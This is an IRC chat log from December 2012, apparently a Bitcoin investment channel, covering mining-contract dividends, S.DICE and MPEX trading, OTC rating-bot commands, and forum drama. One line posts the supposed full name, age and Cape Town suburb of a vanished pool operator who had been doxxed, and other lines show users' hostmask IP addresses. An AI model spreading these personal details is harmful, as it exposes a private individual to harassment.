work there Dec 19 21:02:08 dub: The issue goes down to wether the investor is trying to just make money or increase the security of the network? Dec 19 21:03:00 PeterL: uh if the contract says you get the equiv of 1mh/s who cares how Dec 19 21:03:01 pigeons: and the weather is not too good over there Dec 19 21:03:12 PeterL: I'll asnwer that question for you, EskimoBob cared Dec 19 21:03:13 What kind of cigarettes do hippies smoke? Dec 19 21:03:24 yours Dec 19 21:03:35 which is why its funny that he is doing the same thing Dec 19 21:04:14 dub: how am I exactly "doing the same thing" Dec 19 21:04:18 pigeons: lol Dec 19 21:04:30 please enlighten me, dub Dec 19 21:04:55 EskimoBob: you are paying weekly dividends, yes? Dec 19 21:06:42 I wouldnt bother trying to actually explain it to him Dec 19 21:06:59 just checking to see if I have the correct facts ... Dec 19 21:09:48 I have to pay those form my own pocket for now. Obviously I can not nor do I plan to do this forever. Smiley Dec 19 21:09:52 This is why getting the coin together and ordering the equipment is really important. But hey, this is only the first week. Dec 19 21:11:53 first week of the ponzi is always the hardest Dec 19 21:15:53 i'd like to hear more of the story of clipse myself Dec 19 21:16:06 obviously he was gambling an entire pool's worth of coins Dec 19 21:16:36 who is clipse? Dec 19 21:16:44 it's probably good idea to post your questions to forum so I can answer them Dec 19 21:16:57 clipse is awol Dec 19 21:17:09 he ran a pool that paid higher than normal PPS Dec 19 21:17:26 he became more and more active on irc. until the end. Dec 19 21:17:32 sounds fishy Dec 19 21:17:38 now he is gone Dec 19 21:18:04 he said he paid more cause hopping. then theh money ended up with pirate. then he was gone Dec 19 21:18:19 i think he paid more because he had it at btcst Dec 19 21:18:26 and that's the only reason he paid more Dec 19 21:18:31 because he could afford to Dec 19 21:18:36 oh pirate keeps coming back to bite everybody Dec 19 21:19:06 clipse talked a lot of shit about selling virgin wallet.dat's with solo mined coins Dec 19 21:19:14 for south african Dec 19 21:24:21 how old was he incidentally ? Dec 19 21:24:31 i always suspected late teens Dec 19 21:24:57 i sortof agree Dec 19 21:25:01 no clue though Dec 19 21:25:48 he had a pony avatar, so i'm guessing youngun Dec 19 21:37:10 i think clipse lost a lot of money w/ the pirate thing Dec 19 21:37:31 or he was just a very angry opinionated guy Dec 19 21:37:38 or maybe both Dec 19 21:48:11 someone doxxed clipse its in the forum somwhere Dec 19 21:49:30 Neill Roelofse, 27 and he lives in Cape Town, Bellville. Dec 19 21:51:19 o that old Dec 19 21:52:24 [MPEX] [S.MPOE] 4321 @ 0.00061874 = 2.6736 BTC [+] Dec 19 21:52:26 [MPEX] [S.MPOE] 4379 @ 0.000619 = 2.7106 BTC [+] Dec 19 21:53:20 ok, X.IDIFF.DEC have just settled. Dec 19 21:53:28 everyone please chekc make sure it went ok. Dec 19 22:00:55 telnet pe16 Dec 19 22:01:12 shit Dec 19 22:05:15 Diablo-D3: did james sent out the new list? (in few last days) Dec 19 22:07:34 yes Dec 19 22:07:36 this morning/last night Dec 19 22:07:40 he completed alot of peoples lists Dec 19 22:07:49 sounds like they were non-glbse-claims even Dec 19 22:08:00 no btc addy was supplied for the person I talked to Dec 19 22:08:02 what's that non glbse claims ? Dec 19 22:08:08 ppl who didnt claim Dec 19 22:08:45 two ppl have told me the new list, NOT yaml file, buy csv this time Dec 19 22:08:52 no btc addys, just email and share count Dec 19 22:09:06 aha Dec 19 22:09:45 Ukto: OK, thanx. This is good news Dec 19 22:10:17 a looky there. Dec 19 22:10:28 Namjies, i got a btc with your name on it, what addy do you want it at ? Dec 19 22:11:10 dub uses telnet Dec 19 22:11:31 i use telnet-tunnel for secure Dec 19 22:12:16 i'm just picking Dec 19 22:12:27 telnet? brr... do people still use that stuff? Dec 19 22:12:35 he just wanted to see some routes Dec 19 22:12:43 why not ssh? Dec 19 22:12:53 [MPEX] [S.MPOE] 4321 @ 0.00061537 = 2.659 BTC [-] Dec 19 22:12:54 [MPEX] [S.MPOE] 8979 @ 0.0006151 = 5.523 BTC [-] Dec 19 22:13:11 theres plenty of stuff that only supports telnet Dec 19 22:13:22 probably so Dec 19 22:13:31 its not like its over the internet Dec 19 22:14:16 rrr... this cifs-utils samba drama Dec 19 22:14:22 dub and most of it has to do with cobol Dec 19 22:14:30 Eh fuck. ASICMINER has not resumed trading yet eh... Dec 19 22:14:37 seems not. Dec 19 22:14:42 I'll sssshhh you back Dec 19 22:21:08 Well send there please 1PRsPqFgWjdbbDywFXvVTvp2hUUbDnMzKX Dec 19 22:21:28 Namjies: see pm Dec 19 22:21:48 :P Dec 19 22:21:50 send what? some stolen bitcoinica coins? one sec Dec 19 22:22:00 dub: you admits it! Dec 19 22:22:09 Give it back! my preciousssss..... Dec 19 22:22:19 dub i was owing him a bitcoin Dec 19 22:22:59 For about 1000 ASICMINER he wanted to short. Dec 19 22:23:09 But since it's not trading anymore... Dec 19 22:23:18 thought it was 1300 or something Dec 19 22:23:54 That might be it. I kind of let those go after GLBSE closed and forgot the number since then eh Dec 19 22:24:23 pity glbse closed. i was making nice dough shorting bullcrap Dec 19 22:24:28 I had a few of those, whats happening with them? Dec 19 22:24:29 oh where art thou obsi Dec 19 22:25:04 was kinda hoping they would win the asic race and I could sell them for 10btc each Dec 19 22:25:18 dub nobody wins the asic race. Dec 19 22:26:10 By the way, does that look better than last one? http://www.namworld.net/portfolio/bitvps.com/vps Dec 19 22:26:27 o btw, did you ever release that statement ? Dec 19 22:26:31 or rg was or what ? Dec 19 22:26:37 People apparently didn't like the 3d effect so I removed it. Dec 19 22:26:47 rg did release a statement, I believe Dec 19 22:27:01 link ? Dec 19 22:27:05 and not bad on the gfx. Dec 19 22:28:53 looks good now Dec 19 22:29:02 ;;ticker Dec 19 22:29:02 BTCUSD ticker | Best bid: 13.47493, Best ask: 13.50799, Bid-ask spread: 0.03306, Last trade: 13.47493, 24 hour volume: 34702.98997692, 24 hour low: 13.12250, 24 hour high: 13.57999, 24 hour vwap: 13.33504 Dec 19 22:29:32 Aye. I guess I'm not good enough yet at 3d effects Dec 19 22:29:58 Plus arij/phungus seems to like more simple designs. Dec 19 22:30:06 We might still go with v2 Dec 19 22:30:27 in case anyone missed it earlier, http://trilema.com/2012/smpoe-owner-shares-block/ Dec 19 22:30:33 Instead, but I'm trying to make something more potent if possible. And actually unique and custom. Dec 19 22:31:12 I don't get 5 credits per week. Dec 19 22:31:42 usure ? Dec 19 22:32:05 (the way it works tho, is you have 5 slots, and they expire in 7 days. so if you use all the same day you get 5 more in 7 days) Dec 19 22:32:07 Yes, I've been like 2 months without any credit every time I go on the blog Dec 19 22:32:11 ugh Dec 19 22:32:18 pm your ip Dec 19 22:33:14 will you take Euros? Dec 19 22:33:15 Namjies, do you have admin console for switzerland, or just jerking over the site design so far? Dec 19 22:34:21 could not get enough time from james to upgrade the kernel, or fix ipv6 address Dec 19 22:34:34 members of rota should get free credits. Dec 19 22:35:18 hush, kakobrekla. i shall submit the FSA stuff on venetfx to rota. just for lulz. Dec 19 22:35:26 yes, how is the rota coming along Dec 19 22:35:41 ask phungus/arij, I don't have access to servers yet. Dec 19 22:35:56 I'll be doing design/tickets/management tasks. Dec 19 22:36:06 Lyspooner only btc Dec 19 22:36:35 jcpham http://trilema.com/2012/the-first-roll-of-judges-december-2012/ Dec 19 22:36:37 now we need litigants. Dec 19 22:36:42 ppl pls to sue kthx Dec 19 22:36:46 any plans to list single-stock futures? imagine MPEX listing an option on MPEX that expires into MPEX shares Dec 19 22:36:59 jurov, go ahead, MP will just short it (the fsa) Dec 19 22:37:01 yay! Dec 19 22:37:09 Lyspooner no because http://trilema.com/2012/why-smpoe-is-worth-more-than-mtgox/#comment-91034 Dec 19 22:37:53 kakobrekla, maybe rota will order FSA to register you promptly Dec 19 22:38:13 i'd like to say thanks and that these judges look impartial to me Dec 19 22:40:37 jcpham clean slate so far, so ya they do Dec 19 22:40:38 or, on second thought, rota will ask fsa to UNregister you. so that you will stay completely outside of law as is proper in btcland. Dec 19 22:41:01 i don't think fsa is advanced enough to have a pgp sign Dec 19 22:43:20 fsa has got nothing to do with bitcoin clients in the first place, it is as irrelevant as MNW's signature Dec 19 22:43:48 brb Dec 19 22:44:15 aw no cosby Dec 19 22:44:49 speaking of MNW's signature, remember, only you back bitcoins Dec 19 22:44:50 Namjies, are these phungus/arij in irc somewhere? Dec 19 22:45:00 bitvps client area cert just expired Dec 19 22:45:08 jurov: #bitvps #bitcoin-otc Dec 19 22:46:02 indeed, #bitvps channel would be where to find us. Dec 19 22:46:39 done Dec 19 22:59:37 mircea_popescu: the judges sit for a year at a time? Dec 19 22:59:59 yeah Dec 19 23:00:20 "disqualified for lack of proper form" heh Dec 19 23:00:32 hm ? Dec 19 23:00:51 sounds like, did not show adequate commitment Dec 19 23:01:15 i misspelled adjudicator in mine Dec 19 23:01:18 something likw that. Dec 19 23:01:26 i can only imagine how bad the denied application was Dec 19 23:01:28 dude wants to judge must pgp Dec 19 23:01:37 jcpham its in the thread Dec 19 23:01:38 in the team america sense of showing commitment Dec 19 23:01:43 ooooh Dec 19 23:01:57 i'm actually excited Dec 19 23:02:03 i hope no one ever has a dispute Dec 19 23:02:15 lol Dec 19 23:02:18 easiest 30 btc ever Dec 19 23:02:27 yeah, seems like a shitty job to me tbh Dec 19 23:02:34 it could turn ugly Dec 19 23:02:39 who knows Dec 19 23:02:45 but all power to those willing to do it Dec 19 23:02:51 someone's gotta do it./ Dec 19 23:03:03 i think the judges are more than reputable Dec 19 23:03:14 excluding me of course Dec 19 23:03:38 of course, you're just a cunt Dec 19 23:04:19 speaking of cunt, someone I work with drove into the carpark behind me today Dec 19 23:04:24 http://polimedia.us/dtng/c/src/135594840469.jpg Dec 19 23:04:26 in a gt86 Dec 19 23:05:03 i am a whole buttload of raspberry jelly Dec 19 23:05:52 is that the frs? Dec 19 23:06:13 yeah Dec 19 23:06:21 i lurv Dec 19 23:06:26 i have the 1996 version Dec 19 23:07:14 o so pirate paid ? Dec 19 23:07:24 yarly Dec 19 23:07:37 not that i'm aware of Dec 19 23:07:52 feel free to pay me. :P Dec 19 23:07:57 jcpham but you got car :D Dec 19 23:07:59 did i just get made fun of Dec 19 23:08:01 wat is 1996 ver? Dec 19 23:08:11 oh supra? Dec 19 23:08:11 my supra predates pirate Dec 19 23:08:17 Undecided. Please check back later. :P Dec 19 23:08:20 by about 6 years Dec 19 23:08:29 supra != 86 tyvm Dec 19 23:08:38 bleh Dec 19 23:08:52 it's as close as anybody will ever get Dec 19 23:08:56 coming from toyota Dec 19 23:09:28 i've only sat in one fr-s Dec 19 23:12:44 im waiting for the RC model to drop next year Dec 19 23:12:58 then I'll beg mrs dub to let me have one Dec 19 23:13:22 what happened to telling her to go earn you one Dec 19 23:14:43 [MPEX] [S.DICE] 64558 @ 0.0036 = 232.4088 BTC [+] Dec 19 23:14:45 [MPEX] [S.DICE] 1650 @ 0.00364467 = 6.0137 BTC [+] Dec 19 23:14:45 [MPEX] [S.DICE] 8927 @ 0.003699 = 33.021 BTC [+] Dec 19 23:14:46 [MPEX] [S.DICE] 174865 @ 0.0036995 = 646.9131 BTC [+] Dec 19 23:14:49 In India, for legal works, which has to be done by timely & correctly, we need to bribe 1000+ INR. Dec 19 23:14:49 For illegal or other works, then maybe up to 10 times or more. Dec 19 23:14:49 possibly swap the engine from my corolla into it Dec 19 23:14:54 cute. Dec 19 23:15:32 [MPEX] [S.DICE] 250000 @ 0.0036995 = 924.875 BTC [+] Dec 19 23:15:41 !ticker s.dice Dec 19 23:15:44 [MPEX:S.DICE] 1day: 0.0035 / 0.00368019 / 0.0036995 (536763 shares, 1,975.39 BTC), 30day: 0.0018 / 0.00343144 / 0.0037 (7135181 shares, 24,483.96 BTC) Dec 19 23:15:55 le yum. Dec 19 23:26:02 [MPEX] [S.DICE] 25000 @ 0.0036995 = 92.4875 BTC [+] Dec 19 23:30:58 jcpham: Oh awesome.. are you the guy who was telling off that guy with the camera in your face, and then who clipped buddy with your car? Dec 19 23:32:42 http://www.youtube.com/watch?v=VgYtgXUb2kE Dec 19 23:38:39 midnightmagic: sounds like a video of coingenuity that was floating around Dec 19 23:39:43 [MPEX] [S.DICE] 115000 @ 0.0036995 = 425.4425 BTC [+] Dec 19 23:43:42 Whoever the poor guy is, he's sitting outside and he keeps repeating, "Fuck OFF jason, fuck OFF jason, jason FUCK OFF." Except I'm not sure "jason" is the right name I'm quoting. Dec 19 23:44:20 intersango closed the GBP trading down for good Dec 19 23:44:50 I guess if you can not send out GBP to bank accounts, it is pointless Dec 19 23:45:25 LOL, the comment following: Great, now close the rest of the site. Dec 19 23:45:35 that's not me midnightmagic Dec 19 23:45:50 or i don't think it is Dec 19 23:46:14 i want to see this video Dec 19 23:46:20 now all they need to do is rename it to "3 stooges" and be done with it Dec 19 23:46:41 phantomcircuit said that people would be able to cash out with international wires with not-yet-known fees Dec 19 23:47:40 davout: did you see the SEPA transfer fee? it's 10 EUR! LOL, it actually cost only 0.36€ Dec 19 23:47:45 davout are they launching a real estate project ? Dec 19 23:49:31 wow! ART 42915@1.0 :) Dec 19 23:49:33 EskimoBob: SEPA transfer fees vary depending on the bank Dec 19 23:49:49 this is it, we are mowing forward Dec 19 23:49:58 EskimoBob: when bitcoin-central was still dealing with the fuckers at the Rietumu bank it was a whopping 15€ Dec 19 23:50:10 anyway, it all sounds fucked up Dec 19 23:51:47 so, we have 6026 shares of ART left for now Dec 19 23:52:14 this is just awesome! Dec 20 00:01:19 what, you guys are not happy for me? :) Dec 20 00:04:41 hi Dec 20 00:04:45 any s.dice sellers Dec 20 00:04:46 = Dec 20 00:04:47 brokers Dec 20 00:04:48 = Dec 20 00:04:49 ??? Dec 20 00:05:01 Azelphur= Dec 20 00:05:01 ? Dec 20 00:05:07 =->?* Dec 20 00:05:07 Anduck= Dec 20 00:05:14 do you have mpex acc? Dec 20 00:05:16 i think u did Dec 20 00:05:19 yea Dec 20 00:05:20 or i remember wrong Dec 20 00:05:25 smickles: does brokerage iirc Dec 20 00:05:25 jurov does brokerage Dec 20 00:05:27 do you wanna be ma broker for S.DICE? Dec 20 00:05:32 midnightmagic: thats coingenuity afaik Dec 20 00:05:33 yay Dec 20 00:05:35 what are their fees? Dec 20 00:05:43 and how much Azelphur takes as fee? Dec 20 00:05:52 cuz i would prefer Azelphur cuz he's here and i like him Dec 20 00:05:58 I don't do brokerage, so try the others first Dec 20 00:06:00 :( Dec 20 00:06:00 ok Dec 20 00:06:02 smickles ? Dec 20 00:06:05 ya there? Dec 20 00:06:07 yo Dec 20 00:06:21 how much ya take fee for s.dice brokerage? Dec 20 00:06:42 min(3%,.5btc) Dec 20 00:06:53 pretty heavy fee Dec 20 00:06:59 Anduck: https://coinbr.com/ref?c=A3R7Tstq16 Dec 20 00:07:09 it seems to be the cheapest on the market Dec 20 00:07:36 no fees other than that commission on buys/sells Dec 20 00:07:52 and I give .1% apy on btc balances Dec 20 00:07:55 apy? Dec 20 00:08:00 interest Dec 20 00:08:04 hmmm Dec 20 00:08:12 smickles: are you trusted? Dec 20 00:08:18 i don't really remember - sorry Dec 20 00:08:18 ;;getrating smickles Dec 20 00:08:19 Currently authenticated from hostmask smickles!~smickles@mostofmany.com . User smickles, rated since Wed Jan 4 18:28:52 2012. Cumulative rating 78, from 48 total ratings. Received ratings: 47 positive, 1 negative. Sent ratings: 47 positive, 5 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=smickles Dec 20 00:08:19 barely Dec 20 00:08:20 ;;ident Dec 20 00:08:21 You are identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Dec 20 00:08:21 yeah u are Dec 20 00:08:36 anduck don't let gribble fool you Dec 20 00:08:46 Azelphur: you should pop my rating cherry Dec 20 00:08:50 mm jcpham hmmmm Dec 20 00:08:55 ;;rated dub Dec 20 00:08:56 You have not yet rated user dub Dec 20 00:08:59 o.O Dec 20 00:09:01 ;;rated jcpham Dec 20 00:09:01 You rated user jcpham on Thu Aug 16 09:11:10 2012, giving him a rating of 3, and supplied these additional notes: None. Dec 20 00:09:09 ;;rated smickles Dec 20 00:09:09 You rated user smickles on Wed Aug 15 10:56:42 2012, giving him a rating of 5, and supplied these additional notes: Top notch community member.. Dec 20 00:09:21 ;;rate dub 1 Asked me to pop his rating cherry Dec 20 00:09:22 Rating entry successful. Your rating of 1 for user dub has been recorded. Dec 20 00:09:43 smickles if we've rated each other, does that mean we are in collusion? Dec 20 00:09:45 dub: how do you not have a rating after all this time Dec 20 00:09:47 ;;rated dub Dec 20 00:09:48 You have not yet rated user dub Dec 20 00:09:48 and running a pool Dec 20 00:09:48 lol Dec 20 00:09:51 i think i have ratings for pigeons also Dec 20 00:09:54 omg poor dub Dec 20 00:10:04 ;;rate Azelphur fulfilled mining contract for ~30BTC Dec 20 00:10:04 Error: 'fulfilled' is not a valid integer. Dec 20 00:10:09 dub has a pool? Dec 20 00:10:09 ;;rate Azelphur 1 fulfilled mining contract for ~30BTC Dec 20 00:10:10 Rating entry successful. Your rating of 1 for user Azelphur has been recorded. Dec 20 00:10:11 xD Dec 20 00:10:18 Azelphur: I only regged yesterday Dec 20 00:10:35 ah Dec 20 00:10:38 ;;rate dub 1 wastes much time on irc Dec 20 00:10:40 Rating entry successful. Your rating of 1 for user dub has been recorded. Dec 20 00:10:40 lol Dec 20 00:10:57 congrats EskimoBob Dec 20 00:11:07 i imagine you'll be hearing from the investor Dec 20 00:11:22 smickles: i want to put more money on account with you Dec 20 00:11:27 ;;rate dub 1 he's been around a while. Dec 20 00:11:28 Rating entry successful. Your rating of 1 for user dub has been recorded. Dec 20 00:11:49 I guess so. Guy placed like 290+ BTC Dec 20 00:12:27 This is getting truly exiting Dec 20 00:12:39 thestringpuller: pm me :) Dec 20 00:12:56 ;;getrating dub Dec 20 00:12:57 Currently authenticated from hostmask dub!dub@unaffiliated/dub . User dub, rated since Wed Dec 19 14:09:17 2012. Cumulative rating 3, from 3 total ratings. Received ratings: 3 positive, 0 negative. Sent ratings: 1 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=dub Dec 20 00:13:04 ;;rate mircea_popescu 2 owns MPEX, hasnt stolen my BTC Dec 20 00:13:06 Rating entry successful. Your rating of 2 for user mircea_popescu has been recorded. Dec 20 00:13:11 omg Dec 20 00:13:14 i think that makes me Dec 20 00:13:18 makomk malaimo markedathome maximian midnightmagic MiningBuddy mircea_popescu mod6 Dec 20 00:13:18 makomk malaimo markedathome maximian midnightmagic MiningBuddy mircea_popescu mod6 Dec 20 00:13:20 ;;getrating mircea_popescu Dec 20 00:13:21 Currently authenticated from hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu . User mircea_popescu, rated since Fri Jul 22 08:04:26 2011. Cumulative rating 100, from 46 total ratings. Received ratings: 45 positive, 1 negative. Sent ratings: 56 positive, 7 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=mircea_popescu Dec 20 00:13:23 100! Dec 20 00:13:30 the first person not to steal my btc? Dec 20 00:13:32 oh Dec 20 00:13:45 ;;getrating thestringpuller Dec 20 00:13:46 WARNING: Currently not authenticated. User thestringpuller, rated since Mon Oct 15 15:46:37 2012. Cumulative rating 5, from 4 total ratings. Received ratings: 4 positive, 0 negative. Sent ratings: 4 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=thestringpuller Dec 20 00:13:53 5? Dec 20 00:13:55 ;;getrating jurov Dec 20 00:13:56 WARNING: Currently not authenticated. User jurov, rated since Fri Jan 20 15:16:32 2012. Cumulative rating 14, from 9 total ratings. Received ratings: 9 positive, 0 negative. Sent ratings: 6 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=jurov Dec 20 00:13:59 howd that hapoen Dec 20 00:14:02 i am now in that select club of three digiteers. Dec 20 00:14:07 ;;ident jurov Dec 20 00:14:08 Nick 'jurov', with hostmask 'jurov!~jurov@84.245.71.31', is not identified. Dec 20 00:14:18 jurov is our jurov? Dec 20 00:14:26 yes Dec 20 00:14:34 need to do business? Dec 20 00:14:52 more fun to not auth and see what happens Dec 20 00:16:15 now we watch EskimoBob crash the price of litecoin as he cashes out to buy his equipment Dec 20 00:17:23 if litecoin price crashes, does anyone really lose? Dec 20 00:17:35 wait you can actually sell litecoin ? Dec 20 00:17:45 i keep hearing about it Dec 20 00:17:51 i think there is an exchange Dec 20 00:19:22 i must confess, of all drama sources for this wednesday the last thing i was expecting was r.ver going berserk. Dec 20 00:19:32 btc drama has much in common with spanish inquisition. Dec 20 00:21:12 link? Dec 20 00:21:58 pigeons: :) I have to do this really carefully. No hurry or this will get ugly :) Dec 20 00:22:15 dub you missed that ?! Dec 20 00:22:32 who is r.ver? Dec 20 00:23:06 roger ver Dec 20 00:23:17 or as he calls himself, "bitcoin jesus" Dec 20 00:23:30 ok Dec 20 00:23:52 bitcoin jesus like historical jesus Dec 20 00:23:57 or bitcoin jesus water into wine Dec 20 00:24:20 "I'm Roger Ver, the most prolific Bitcoin investor the world has ever seen" Dec 20 00:24:29 all of us are like historical jesus Dec 20 00:24:39 a regular guy Dec 20 00:24:39 well, after his spasm today, he's more like bitcoin idiot Dec 20 00:24:49 link please Dec 20 00:24:51 i didn't get to see the spasm Dec 20 00:24:55 just heard about it Dec 20 00:24:58 link svp Dec 20 00:24:58 so link it Dec 20 00:25:02 https://bitcointalk.org/index.php?topic=131574.20 Dec 20 00:26:14 so he actually used those words Dec 20 00:26:34 no he actually spelled most as "post" Dec 20 00:26:52 mircea_popescu: is it that in common: no one expects it? Dec 20 00:26:55 oh that's the vid card drama Dec 20 00:27:16 he's a little full of himself after that comment Dec 20 00:27:22 i mine at coinlab Dec 20 00:27:29 roger is payingme Dec 20 00:27:30 whether it's true or not Dec 20 00:27:34 and gigavps Dec 20 00:27:36 roger is paying me too Dec 20 00:27:38 :) Dec 20 00:27:42 25% moar Dec 20 00:27:44 gigavps are you taking roger's money? Dec 20 00:27:45 i am Dec 20 00:28:16 roger ver is the coinlab guy? Dec 20 00:28:17 coinlab is paying me 25% moar for the next three weeks Dec 20 00:28:27 i think i have like 6 left Dec 20 00:28:31 oh i expected he loses it on this: https://bitcointalk.org/index.php?topic=131648.msg1409675 Dec 20 00:28:31 he was part of the $500k round Dec 20 00:29:03 that's crazy over 4btc Dec 20 00:29:09 lawyers and such Dec 20 00:30:42 so the big thing now is that blockchain.info had previously claimed that links from "anonymous" addresses were not logged Dec 20 00:30:52 yet there was an admin interface to look this up Dec 20 00:32:10 whoops Dec 20 00:32:41 oopsie, forgot to tell ya'll about that. we have to spport people Dec 20 00:33:34 https://bitcointalk.org/index.php?topic=128841.msg1409754#msg1409754 Dec 20 00:40:36 damn. buyer didnt cut into the S.DICE Tier 3. Dec 20 00:40:48 Stop selling below .0037 people Dec 20 00:41:02 that always works Dec 20 00:41:04 just the the market buy through and we are gonna be at .005 Dec 20 00:41:14 nooe Dec 20 00:41:22 sdice is gonna plummet Dec 20 00:41:31 when? Dec 20 00:41:32 and we'll short the shit out of it Dec 20 00:41:37 after divs Dec 20 00:41:48 after divs it will drop 4% Dec 20 00:42:03 well, after his spasm today, he's more like bitcoin idiot << i think btcppl don't get enoug hsleep. Dec 20 00:42:05 or whatever the div payout it Dec 20 00:42:06 is Dec 20 00:42:41 not if someone dumps inventory Dec 20 00:42:53 like a bunch of tier 1 Dec 20 00:43:03 then it will plummet... Dec 20 00:43:43 In a liquid market, price will drop the value of the dividend payment. Dec 20 00:44:00 because the dividend is priced in Dec 20 00:44:12 eveyone, remember these people. they are agents for smickles' shorting service Dec 20 00:44:19 some people will sell right before the divvy to maximize thier sale price Dec 20 00:44:30 some will be buying right after on the dip Dec 20 00:44:30 dividends are like 2 weeks away still Dec 20 00:44:36 yes Dec 20 00:44:38 it can end up + or - 10k Dec 20 00:44:39 and its a bubble Dec 20 00:44:43 someone will make more money than the other person Dec 20 00:44:46 it smells like bubble Dec 20 00:44:51 we'll see Dec 20 00:44:58 but in an efficient market, it will drop divvy value Dec 20 00:45:08 less bubblicious than mpoe Dec 20 00:45:14 everything hinges on if S.DICE can keep up the betting volume Dec 20 00:45:17 Bugpowder it doesn't make so much sense to drop div value seeing how this is a btc sort of company. no assets. Dec 20 00:45:39 but anyway, i never saw a bubble consisting of price movement from 32 to 37. Dec 20 00:45:53 not yet Dec 20 00:46:06 and yeah, mpoe went from ~2.9 to like 63 Dec 20 00:46:10 over 9 months Dec 20 00:46:15 mircea_popescu I disagree, market prices in the value. Dec 20 00:46:31 S.DICE was slowing down until the whales showed up Dec 20 00:46:45 but they are sporadic... Dec 20 00:46:54 ugh Dec 20 00:46:55 ya i think it was trading more on momentum/inferred momentum than anything Dec 20 00:47:36 ahaha digging through old posts, 2 Aprilie 2012 One website offering Bitcoin options trading was ‘listed’ this month for an implied valuation of half a million dollars. Sursa : Reuters. Dec 20 00:48:20 This whale still has 12,000 BTC in his betting address... http://blockchain.info/address/1EP4rM8hLZCRSWPNZDWJp9zdvmoWYkkgbQ Dec 20 00:49:29 hmm...in fact i remember coinbr getting some funding from similat whale-ish addy Dec 20 00:49:54 http://blockchain.info/charts/balance?address=1Di6ux3CQBNXCZLD76BsnYWDo6XnFGzQah Dec 20 00:49:57 < jurov> eveyone, remember these people. they are agents for smickles' shorting service << mwahahah Dec 20 00:50:30 i find it boggling someone'd be betting 10-20-50k btc Dec 20 00:50:48 There is still a lot of time left before div payment and trading volume tends to increase prior to payment. Dec 20 00:50:54 yeah i had to close that blockahin link Dec 20 00:50:56 i got angry Dec 20 00:51:01 lol Dec 20 00:51:12 i hope that's a lucky bot Dec 20 00:51:15 why, you bet it too. Dec 20 00:51:16 not a lucky human Dec 20 00:51:26 not like that Dec 20 00:51:31 o i c Dec 20 00:51:38 [MPEX] [S.MPOE] 4321 @ 0.00061898 = 2.6746 BTC [+] Dec 20 00:51:39 [MPEX] [S.MPOE] 3779 @ 0.000619 = 2.3392 BTC [+] Dec 20 00:51:43 i need more risk! Dec 20 00:52:12 i kinda rue the day one of these whales discovers what reverse martingale is and tears sdice a new one. Dec 20 00:52:47 in other news, it looks like s.mpoe trades thinned to a trickle Dec 20 00:52:49 jcpham short unhedged puts at 14. Dec 20 00:52:54 I think this roger ver business is grounds for a round of panic selling anyway Dec 20 00:53:03 have at it Dec 20 00:53:03 panic sell Dec 20 00:53:07 sell sell sell Dec 20 00:53:11 ;;tickee Dec 20 00:53:11 Error: "tickee" is not a valid command. Dec 20 00:53:12 ;;ticker Dec 20 00:53:13 BTCUSD ticker | Best bid: 13.43403, Best ask: 13.49499, Bid-ask spread: 0.06096, Last trade: 13.49499, 24 hour volume: 34245.99274865, 24 hour low: 13.20000, 24 hour high: 13.57999, 24 hour vwap: 13.37071 Dec 20 00:53:20 i like how he thinks his whining will harm bitcoin Dec 20 00:53:22 ;;tickle Dec 20 00:53:23 Error: "tickle" is not a valid command. Dec 20 00:53:25 if it isn't deleted Dec 20 00:53:25 nope Dec 20 00:53:31 i like how he thinks his whining will harm bitcoin << werd. Dec 20 00:53:50 most prolific bitcoin masturbator throws toys, SELL WHILE YOU CAN Dec 20 00:54:19 sometimes i wonder if im the only btc investor that gets laid. Dec 20 00:54:59 meh Dec 20 00:55:04 people are yammering in here Dec 20 00:55:06 I go take a nap Dec 20 00:55:08 come back Dec 20 00:55:10 people are yammering in here Dec 20 00:55:15 some things never change Dec 20 00:55:17 go take a nap. Dec 20 00:55:43 [MPEX] [S.MPOE] 4321 @ 0.00061866 = 2.6732 BTC [-] Dec 20 00:55:45 [MPEX] [S.MPOE] 13887 @ 0.000619 = 8.5961 BTC [+] Dec 20 00:56:01 https://bitcointalk.org/index.php?topic=127488.msg1410202#msg1410202 inquiring minds wish to know Dec 20 00:56:50 is whether or not giga is a scammer based solely on the GIGAMINING asset or some other event? Dec 20 00:56:54 mircea_popescu: you already know whats going on there Dec 20 00:56:57 giga is suing nefario Dec 20 00:57:11 nefario thinks he can win in court by not giving giga the info or the btc Dec 20 00:57:14 Diablo-D3 the voting notion amuses me. Dec 20 00:57:22 let us have an election trial! Dec 20 00:57:31 yeah, how the fuck does that work Dec 20 00:57:44 whoever shows tits is not guilty ? Dec 20 00:57:55 hah Dec 20 00:57:57 wait Dec 20 00:57:57 bitcoin, its democratastic Dec 20 00:58:10 FEAR MY MANLY MAN BOOBS Dec 20 00:58:26 AND MY COARSE CHEST HAIR Dec 20 00:58:38 go back to nap Dec 20 00:58:43 seriously, 3M has been after me for my chest hair, its the most abrasive shit ever Dec 20 00:58:52 well, second to my beard Dec 20 00:58:55 nap, srsly. Dec 20 00:59:44 Are they suing in the rota? Dec 20 01:00:14 not yet Dec 20 01:00:15 what would be the point? Dec 20 01:00:20 i think that's not phantastique enough yet Dec 20 01:00:39 the only reason to sue in rota is if the other pary has a reputation to lose Dec 20 01:00:48 this is true Dec 20 01:01:01 which is by now all of like... 5 people Dec 20 01:01:08 nefario will need a new identity to get anyone other than amir to trust him Dec 20 01:01:14 well,in fact i tried to inflict upon Ukto the agreement that if violated, shall be judger by rota Dec 20 01:01:26 but he said he forgot pgp passphrase :/ Dec 20 01:01:26 omg and he refused ? Dec 20 01:01:34 SCAM Dec 20 01:01:35 so, no rota... Dec 20 01:01:42 ;;ident Ukto Dec 20 01:01:42 Nick 'Ukto', with hostmask 'Ukto!~Kami-Sama@99-30-79-193.lightspeed.rcsntx.sbcglobal.net', is not identified. Dec 20 01:02:48 no that is not fully correct. in fact he first said that his software has no clearsign function Dec 20 01:02:57 eh?! Dec 20 01:04:00 --clearsign Dec 20 01:04:13 is he on like a mac or something ? Dec 20 01:04:22 oh wait i can be sued Dec 20 01:04:25 he uses kleopatra on windows or something Dec 20 01:04:36 kleo can clearsign Dec 20 